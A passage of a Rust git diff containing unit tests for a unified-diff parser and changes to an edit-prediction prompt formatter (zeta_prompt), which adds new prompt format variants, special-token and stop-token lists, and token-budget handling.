{" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + context + -deleted + +added line + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "context\ndeleted\n".into(), + edits: vec![Edit { + range: 8..16, + text: "added line".into() + }], + start_line: Some(0), // @@ -1,2 -> line 0 (0-indexed) + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_double_no_newline_at_eof() { + // Two consecutive "no newline" markers - the second should be ignored + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -old + +new + line3 + \\ No newline at end of file + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "line1\nold\nline3".into(), // Only one newline removed + edits: vec![Edit { + range: 6..10, // "old\n" is 4 bytes + text: "new\n".into() + }], + start_line: Some(0), + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_no_newline_after_context_not_addition() { + // "No newline" after context lines should remove newline from context, + // not from an earlier addition + let diff = indoc! 
{" + --- a/file.txt + +++ b/file.txt + @@ -1,4 +1,4 @@ + line1 + -old + +new + line3 + line4 + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + // newline removed from line4 (context), not from "new" (addition) + context: "line1\nold\nline3\nline4".into(), + edits: vec![Edit { + range: 6..10, // "old\n" is 4 bytes + text: "new\n".into() // Still has newline + }], + start_line: Some(0), + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_strip_diff_metadata() { + let diff_with_metadata = indoc! {r#" + diff --git a/file.txt b/file.txt + index 1234567..abcdefg 100644 + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,4 @@ + context line + -removed line + +added line + more context + "#}; + + let stripped = strip_diff_metadata(diff_with_metadata); + + assert_eq!( + stripped, + indoc! {r#" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,4 @@ + context line + -removed line + +added line + more context + "#} + ); + } + + #[test] + fn test_apply_diff_to_string_no_trailing_newline() { + // Text without trailing newline; diff generated without + // `\ No newline at end of file` marker. + let text = "line1\nline2\nline3"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -line2 + +replaced + line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nreplaced\nline3"); + } + + #[test] + fn test_apply_diff_to_string_trailing_newline_present() { + // When text has a trailing newline, exact matching still works and + // the fallback is never needed. + let text = "line1\nline2\nline3\n"; + let diff = indoc! 
{" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -line2 + +replaced + line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nreplaced\nline3\n"); + } + + #[test] + fn test_apply_diff_to_string_deletion_at_end_no_trailing_newline() { + // Deletion of the last line when text has no trailing newline. + // The edit range must be clamped so it doesn't index past the + // end of the text. + let text = "line1\nline2\nline3"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,2 @@ + line1 + line2 + -line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nline2\n"); + } + + #[test] + fn test_apply_diff_to_string_replace_last_line_no_trailing_newline() { + // Replace the last line when text has no trailing newline. + let text = "aaa\nbbb\nccc"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + aaa + bbb + -ccc + +ddd + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "aaa\nbbb\nddd"); + } + + #[test] + fn test_apply_diff_to_string_multibyte_no_trailing_newline() { + // Multi-byte UTF-8 characters near the end; ensures char boundary + // safety when the fallback clamps edit ranges. + let text = "hello\n세계"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,2 @@ + hello + -세계 + +world + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "hello\nworld"); + } + + #[test] + fn test_find_context_candidates_no_false_positive_mid_text() { + // The stripped fallback must only match at the end of text, not in + // the middle where a real newline exists. + let text = "aaa\nbbb\nccc\n"; + let mut hunk = Hunk { + context: "bbb\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + // Exact match at offset 4 — the fallback is not used. 
+ assert_eq!(candidates, vec![4]); + } + + #[test] + fn test_find_context_candidates_fallback_at_end() { + let text = "aaa\nbbb"; + let mut hunk = Hunk { + context: "bbb\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + assert_eq!(candidates, vec![4]); + // Context should be stripped. + assert_eq!(hunk.context, "bbb"); + } + + #[test] + fn test_find_context_candidates_no_fallback_mid_text() { + // "bbb" appears mid-text followed by a newline, so the exact + // match succeeds. Verify the stripped fallback doesn't produce a + // second, spurious candidate. + let text = "aaa\nbbb\nccc"; + let mut hunk = Hunk { + context: "bbb\nccc\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + // No exact match (text ends without newline after "ccc"), but the + // stripped context "bbb\nccc" matches at offset 4, which is the end. + assert_eq!(candidates, vec![4]); + assert_eq!(hunk.context, "bbb\nccc"); + } + + #[test] + fn test_find_context_candidates_clamps_edit_ranges() { + let text = "aaa\nbbb"; + let mut hunk = Hunk { + context: "aaa\nbbb\n".into(), + edits: vec![Edit { + range: 4..8, // "bbb\n" — end points at the trailing \n + text: "ccc\n".into(), + }], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + assert_eq!(candidates, vec![0]); + // Edit range end should be clamped to 7 (new context length). 
+ assert_eq!(hunk.edits[0].range, 4..7); + } + + #[test] + fn test_unified_diff_with_context_matches_expected_context_window() { + let old_text = "line1\nline2\nline3\nline4\nline5\nCHANGE_ME\nline7\nline8\n"; + let new_text = "line1\nline2\nline3\nline4\nline5\nCHANGED\nline7\nline8\n"; + + let diff_default = unified_diff_with_context(old_text, new_text, 0, 0, 3); + assert_eq!( + diff_default, + "@@ -3,6 +3,6 @@\n line3\n line4\n line5\n-CHANGE_ME\n+CHANGED\n line7\n line8\n" + ); + + let diff_full_context = unified_diff_with_context(old_text, new_text, 0, 0, 8); + assert_eq!( + diff_full_context, + "@@ -1,8 +1,8 @@\n line1\n line2\n line3\n line4\n line5\n-CHANGE_ME\n+CHANGED\n line7\n line8\n" + ); + + let diff_no_context = unified_diff_with_context(old_text, new_text, 0, 0, 0); + assert_eq!(diff_no_context, "@@ -6,1 +6,1 @@\n-CHANGE_ME\n+CHANGED\n"); + } +} diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index bdd5afffa975adc11176928a89e4cb52b4cd69c3..49b86404a8ad49c27e29bb2b887fb3fc8171c35c 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -1,4 +1,8 @@ -use anyhow::Result; +pub mod excerpt_ranges; +pub mod multi_region; +pub mod udiff; + +use anyhow::{Result, anyhow}; use serde::{Deserialize, Serialize}; use std::fmt::Write; use std::ops::Range; @@ -6,6 +10,10 @@ use std::path::Path; use std::sync::Arc; use strum::{EnumIter, IntoEnumIterator as _, IntoStaticStr}; +pub use crate::excerpt_ranges::{ + ExcerptRanges, compute_editable_and_context_ranges, compute_legacy_excerpt_ranges, +}; + pub const CURSOR_MARKER: &str = "<|user_cursor|>"; pub const MAX_PROMPT_TOKENS: usize = 4096; @@ -18,55 +26,40 @@ fn estimate_tokens(bytes: usize) -> usize { bytes / 3 } -/// The client's preferred edit prediction model. The server may override this. 
-#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, Serialize, Deserialize)] -pub enum EditPredictionModelKind { - Zeta1, - Zeta2, -} - -/// Pre-computed byte offset ranges within `cursor_excerpt` for different -/// editable and context token budgets. Allows the server to select the -/// appropriate ranges for whichever model it uses. -#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] -pub struct ExcerptRanges { - /// Editable region computed with a 150-token budget. - pub editable_150: Range, - /// Editable region computed with a 180-token budget. - pub editable_180: Range, - /// Editable region computed with a 350-token budget. - pub editable_350: Range, - /// Context boundary when using editable_150 with 350 tokens of additional context. - pub editable_150_context_350: Range, - /// Context boundary when using editable_180 with 350 tokens of additional context. - pub editable_180_context_350: Range, - /// Context boundary when using editable_350 with 150 tokens of additional context. - pub editable_350_context_150: Range, +/// Leave some slack to avoid overflow. +fn apply_prompt_budget_margin(max_tokens: usize) -> usize { + (max_tokens as f64 * 0.9).floor() as usize } #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct ZetaPromptInput { pub cursor_path: Arc, pub cursor_excerpt: Arc, - pub editable_range_in_excerpt: Range, pub cursor_offset_in_excerpt: usize, #[serde(default, skip_serializing_if = "Option::is_none")] pub excerpt_start_row: Option, pub events: Vec>, - pub related_files: Vec, - /// When set, the excerpt was computed with a larger budget (~512 tokens) - /// and these ranges let the server select model-appropriate subsets. - /// When absent, the excerpt IS the context region and - /// `editable_range_in_excerpt` is the only editable range. 
+ #[serde(default)] + pub related_files: Option>, + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub active_buffer_diagnostics: Vec, + /// These ranges let the server select model-appropriate subsets. + pub excerpt_ranges: ExcerptRanges, + /// Byte offset ranges within `cursor_excerpt` for all syntax nodes that + /// contain `cursor_offset_in_excerpt`, ordered from innermost to outermost. + /// When present, the server uses these to compute editable/context ranges + /// instead of `excerpt_ranges`. #[serde(default, skip_serializing_if = "Option::is_none")] - pub excerpt_ranges: Option, - /// Client's preferred model. The server may override. + pub syntax_ranges: Option>>, + /// The name of the edit prediction model experiment to use. #[serde(default, skip_serializing_if = "Option::is_none")] - pub preferred_model: Option, + pub experiment: Option, #[serde(default)] pub in_open_source_repo: bool, #[serde(default)] pub can_collect_data: bool, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub repo_url: Option, } #[derive( @@ -92,6 +85,17 @@ pub enum ZetaFormat { V0131GitMergeMarkersPrefix, V0211Prefill, V0211SeedCoder, + v0226Hashline, + V0304VariableEdit, + V0304SeedNoEdits, + /// Multi-block marker spans with NO_EDITS sentinel. + V0306SeedMultiRegions, + /// Byte-exact marker spans; all intermediate markers emitted; repeated marker means no-edit. + V0316SeedMultiRegions, + /// V0316 with larger block sizes. + V0318SeedMultiRegions, + /// V0316, but marker numbers are relative to the cursor block (e.g. -1, -0, +1). + V0317SeedMultiRegions, } impl std::fmt::Display for ZetaFormat { @@ -102,10 +106,19 @@ impl std::fmt::Display for ZetaFormat { impl ZetaFormat { pub fn parse(format_name: &str) -> Result { + let lower = format_name.to_lowercase(); + + // Exact case-insensitive match takes priority, bypassing ambiguity checks. 
+ for variant in ZetaFormat::iter() { + if <&'static str>::from(&variant).to_lowercase() == lower { + return Ok(variant); + } + } + let mut results = ZetaFormat::iter().filter(|version| { <&'static str>::from(version) .to_lowercase() - .contains(&format_name.to_lowercase()) + .contains(&lower) }); let Some(result) = results.next() else { anyhow::bail!( @@ -128,25 +141,6 @@ impl ZetaFormat { .collect::>() .concat() } - - pub fn special_tokens(&self) -> &'static [&'static str] { - match self { - ZetaFormat::V0112MiddleAtEnd - | ZetaFormat::V0113Ordered - | ZetaFormat::V0114180EditableRegion => &[ - "<|fim_prefix|>", - "<|fim_suffix|>", - "<|fim_middle|>", - "<|file_sep|>", - CURSOR_MARKER, - ], - ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::special_tokens(), - ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill => { - v0131_git_merge_markers_prefix::special_tokens() - } - ZetaFormat::V0211SeedCoder => seed_coder::special_tokens(), - } - } } #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] @@ -200,6 +194,15 @@ pub fn write_event(prompt: &mut String, event: &Event) { } } +#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] +pub struct ActiveBufferDiagnostic { + pub severity: Option, + pub message: String, + pub snippet: String, + pub snippet_buffer_row_range: Range, + pub diagnostic_range_in_snippet: Range, +} + #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct RelatedFile { pub path: Arc, @@ -218,33 +221,123 @@ pub struct RelatedExcerpt { } pub fn prompt_input_contains_special_tokens(input: &ZetaPromptInput, format: ZetaFormat) -> bool { - format - .special_tokens() - .iter() - .any(|token| input.cursor_excerpt.contains(token)) + special_tokens_for_format(format).iter().any(|token| { + if let Some(line_token) = token.strip_suffix('\n') { + input.cursor_excerpt.lines().any(|line| line == line_token) + } else { + input.cursor_excerpt.contains(token) + } + }) +} + +pub fn 
format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option { + format_prompt_with_budget_for_format(input, format, MAX_PROMPT_TOKENS) +} + +pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { + match format { + ZetaFormat::V0112MiddleAtEnd => v0112_middle_at_end::special_tokens(), + ZetaFormat::V0113Ordered => v0113_ordered::special_tokens(), + ZetaFormat::V0114180EditableRegion => v0114180_editable_region::special_tokens(), + ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::special_tokens(), + ZetaFormat::V0131GitMergeMarkersPrefix => v0131_git_merge_markers_prefix::special_tokens(), + ZetaFormat::V0211Prefill => v0211_prefill::special_tokens(), + ZetaFormat::V0211SeedCoder => seed_coder::special_tokens(), + ZetaFormat::v0226Hashline => hashline::special_tokens(), + ZetaFormat::V0304VariableEdit => v0304_variable_edit::special_tokens(), + ZetaFormat::V0304SeedNoEdits => seed_coder::special_tokens(), + ZetaFormat::V0316SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0316_END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0318SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0318_END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0317SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0317_END_MARKER, + CURSOR_MARKER, + multi_region::RELATIVE_MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0306SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + 
seed_coder::START_MARKER, + seed_coder::SEPARATOR, + seed_coder::END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + } } -pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> String { - format_zeta_prompt_with_budget(input, format, MAX_PROMPT_TOKENS) +/// Returns the (editable_token_limit, context_token_limit) for a given format. +pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) { + match format { + ZetaFormat::V0112MiddleAtEnd | ZetaFormat::V0113Ordered => (150, 350), + ZetaFormat::V0114180EditableRegion => (180, 350), + ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0304SeedNoEdits => (350, 150), + ZetaFormat::V0304VariableEdit => (1024, 0), + } } -/// Post-processes model output for the given zeta format by stripping format-specific suffixes. 
-pub fn clean_zeta2_model_output(output: &str, format: ZetaFormat) -> &str { +pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { match format { - ZetaFormat::V0120GitMergeMarkers => output - .strip_suffix(v0120_git_merge_markers::END_MARKER) - .unwrap_or(output), - ZetaFormat::V0131GitMergeMarkersPrefix => output - .strip_suffix(v0131_git_merge_markers_prefix::END_MARKER) - .unwrap_or(output), - ZetaFormat::V0211SeedCoder => output - .strip_suffix(seed_coder::END_MARKER) - .unwrap_or(output), - _ => output, + ZetaFormat::v0226Hashline => &[hashline::NO_EDITS_COMMAND_MARKER], + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304VariableEdit + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0304SeedNoEdits => &[], + ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER], + ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER], + ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER], } } -pub fn excerpt_range_for_format( +pub fn excerpt_ranges_for_format( format: ZetaFormat, ranges: &ExcerptRanges, ) -> (Range, Range) { @@ -253,195 +346,888 @@ pub fn excerpt_range_for_format( ranges.editable_150.clone(), ranges.editable_150_context_350.clone(), ), - ZetaFormat::V0114180EditableRegion - | ZetaFormat::V0120GitMergeMarkers + ZetaFormat::V0114180EditableRegion => ( + ranges.editable_180.clone(), + ranges.editable_180_context_350.clone(), + ), + ZetaFormat::V0120GitMergeMarkers | ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill - | ZetaFormat::V0211SeedCoder => ( + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | 
ZetaFormat::V0317SeedMultiRegions => ( ranges.editable_350.clone(), ranges.editable_350_context_150.clone(), ), + ZetaFormat::V0304VariableEdit => { + let context = ranges + .editable_350_context_1024 + .clone() + .or(ranges.editable_350_context_512.clone()) + .unwrap_or_else(|| ranges.editable_350_context_150.clone()); + (context.clone(), context) + } } } -pub fn resolve_cursor_region( - input: &ZetaPromptInput, - format: ZetaFormat, -) -> (&str, Range, usize) { - let Some(ranges) = &input.excerpt_ranges else { - return ( - &input.cursor_excerpt, - input.editable_range_in_excerpt.clone(), - input.cursor_offset_in_excerpt, - ); - }; - - let (editable_range, context_range) = excerpt_range_for_format(format, ranges); - let context_start = context_range.start; - let context_text = &input.cursor_excerpt[context_range]; - let adjusted_editable = - (editable_range.start - context_start)..(editable_range.end - context_start); - let adjusted_cursor = input.cursor_offset_in_excerpt - context_start; - - (context_text, adjusted_editable, adjusted_cursor) -} - -fn format_zeta_prompt_with_budget( - input: &ZetaPromptInput, +pub fn write_cursor_excerpt_section_for_format( format: ZetaFormat, - max_tokens: usize, -) -> String { - let (context, editable_range, cursor_offset) = resolve_cursor_region(input, format); - let path = &*input.cursor_path; - - let mut cursor_section = String::new(); + prompt: &mut String, + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) { match format { - ZetaFormat::V0112MiddleAtEnd => { - v0112_middle_at_end::write_cursor_excerpt_section( - &mut cursor_section, - path, - context, - &editable_range, - cursor_offset, - ); - } + ZetaFormat::V0112MiddleAtEnd => v0112_middle_at_end::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ), ZetaFormat::V0113Ordered | ZetaFormat::V0114180EditableRegion => { v0113_ordered::write_cursor_excerpt_section( - &mut cursor_section, + prompt, 
path, context, - &editable_range, + editable_range, cursor_offset, ) } ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::write_cursor_excerpt_section( - &mut cursor_section, + prompt, path, context, - &editable_range, + editable_range, cursor_offset, ), ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill => { v0131_git_merge_markers_prefix::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ) + } + ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => { + seed_coder::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ) + } + ZetaFormat::v0226Hashline => hashline::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ), + ZetaFormat::V0304VariableEdit => { + v0304_variable_edit::write_cursor_excerpt_section(prompt, path, context, cursor_offset) + } + ZetaFormat::V0306SeedMultiRegions => { + prompt.push_str(&build_v0306_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0316SeedMultiRegions => { + prompt.push_str(&build_v0316_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0318SeedMultiRegions => { + prompt.push_str(&build_v0318_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0317SeedMultiRegions => { + prompt.push_str(&build_v0317_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + } +} + +fn build_v0306_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + section.push_str(seed_coder::START_MARKER); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = 
cursor_offset - editable_range.start; + multi_region::write_editable_with_markers( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section.push_str(seed_coder::SEPARATOR); + section +} + +fn build_v0316_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0316( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn build_v0318_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0318( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn build_v0317_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable 
= cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0317( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn offset_range_to_row_range(text: &str, range: Range) -> Range { + let start_row = text[0..range.start].matches('\n').count() as u32; + let mut end_row = start_row + text[range.clone()].matches('\n').count() as u32; + if !text[..range.end].ends_with('\n') { + end_row += 1; + } + return start_row..end_row; +} + +pub fn format_prompt_with_budget_for_format( + input: &ZetaPromptInput, + format: ZetaFormat, + max_tokens: usize, +) -> Option { + let (context, editable_range, context_range, cursor_offset) = + resolve_cursor_region(input, format); + let path = &*input.cursor_path; + + let empty_files = Vec::new(); + let input_related_files = input.related_files.as_deref().unwrap_or(&empty_files); + let related_files = if let Some(cursor_excerpt_start_row) = input.excerpt_start_row { + let relative_row_range = offset_range_to_row_range(&input.cursor_excerpt, context_range); + let row_range = relative_row_range.start + cursor_excerpt_start_row + ..relative_row_range.end + cursor_excerpt_start_row; + &filter_redundant_excerpts( + input_related_files.to_vec(), + input.cursor_path.as_ref(), + row_range, + ) + } else { + input_related_files + }; + + let prompt = match format { + ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => { + let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( + format, &mut cursor_section, path, context, &editable_range, cursor_offset, + ); + + let budget_with_margin = apply_prompt_budget_margin(max_tokens); + seed_coder::assemble_fim_prompt( + context, + &editable_range, + &cursor_section, + &input.events, + 
related_files, + budget_with_margin, ) } - ZetaFormat::V0211SeedCoder => { - return seed_coder::format_prompt_with_budget( + _ => { + let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( + format, + &mut cursor_section, path, context, &editable_range, cursor_offset, + ); + + let mut remaining_budget = apply_prompt_budget_margin(max_tokens); + let cursor_tokens = estimate_tokens(cursor_section.len()); + remaining_budget = remaining_budget.saturating_sub(cursor_tokens); + + let edit_history_section = format_edit_history_within_budget( &input.events, - &input.related_files, - max_tokens, + "<|file_sep|>", + "edit history", + remaining_budget, + max_edit_event_count_for_format(&format), ); - } - } + let edit_history_tokens = estimate_tokens(edit_history_section.len()); + remaining_budget = remaining_budget.saturating_sub(edit_history_tokens); - let cursor_tokens = estimate_tokens(cursor_section.len()); - let budget_after_cursor = max_tokens.saturating_sub(cursor_tokens); + let related_files_section = format_related_files_within_budget( + &related_files, + "<|file_sep|>", + "", + remaining_budget, + ); - let edit_history_section = format_edit_history_within_budget( - &input.events, - "<|file_sep|>", - "edit history", - budget_after_cursor, - ); - let edit_history_tokens = estimate_tokens(edit_history_section.len()); - let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); - - let related_files_section = format_related_files_within_budget( - &input.related_files, - "<|file_sep|>", - "", - budget_after_edit_history, - ); + let mut prompt = String::new(); + prompt.push_str(&related_files_section); + prompt.push_str(&edit_history_section); + prompt.push_str(&cursor_section); + prompt + } + }; + let prompt_tokens = estimate_tokens(prompt.len()); + if prompt_tokens > max_tokens { + return None; + } + return Some(prompt); +} - let mut prompt = String::new(); - prompt.push_str(&related_files_section); - 
prompt.push_str(&edit_history_section); - prompt.push_str(&cursor_section); - prompt +pub fn filter_redundant_excerpts( + mut related_files: Vec, + cursor_path: &Path, + cursor_row_range: Range, +) -> Vec { + for file in &mut related_files { + if file.path.as_ref() == cursor_path { + file.excerpts.retain(|excerpt| { + excerpt.row_range.start < cursor_row_range.start + || excerpt.row_range.end > cursor_row_range.end + }); + } + } + related_files.retain(|file| !file.excerpts.is_empty()); + related_files } -pub fn get_prefill(input: &ZetaPromptInput, format: ZetaFormat) -> String { +pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize { match format { ZetaFormat::V0112MiddleAtEnd | ZetaFormat::V0113Ordered | ZetaFormat::V0114180EditableRegion | ZetaFormat::V0120GitMergeMarkers | ZetaFormat::V0131GitMergeMarkersPrefix - | ZetaFormat::V0211SeedCoder => String::new(), - ZetaFormat::V0211Prefill => { - let (context, editable_range, _) = resolve_cursor_region(input, format); - v0211_prefill::get_prefill(context, &editable_range) - } + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0304VariableEdit + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => 6, } } -fn format_edit_history_within_budget( - events: &[Arc], - file_marker: &str, - edit_history_name: &str, - max_tokens: usize, +pub fn get_prefill_for_format( + format: ZetaFormat, + context: &str, + editable_range: &Range, ) -> String { - let header = format!("{}{}\n", file_marker, edit_history_name); - let header_tokens = estimate_tokens(header.len()); - if header_tokens >= max_tokens { - return String::new(); + match format { + ZetaFormat::V0211Prefill => v0211_prefill::get_prefill(context, editable_range), + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | 
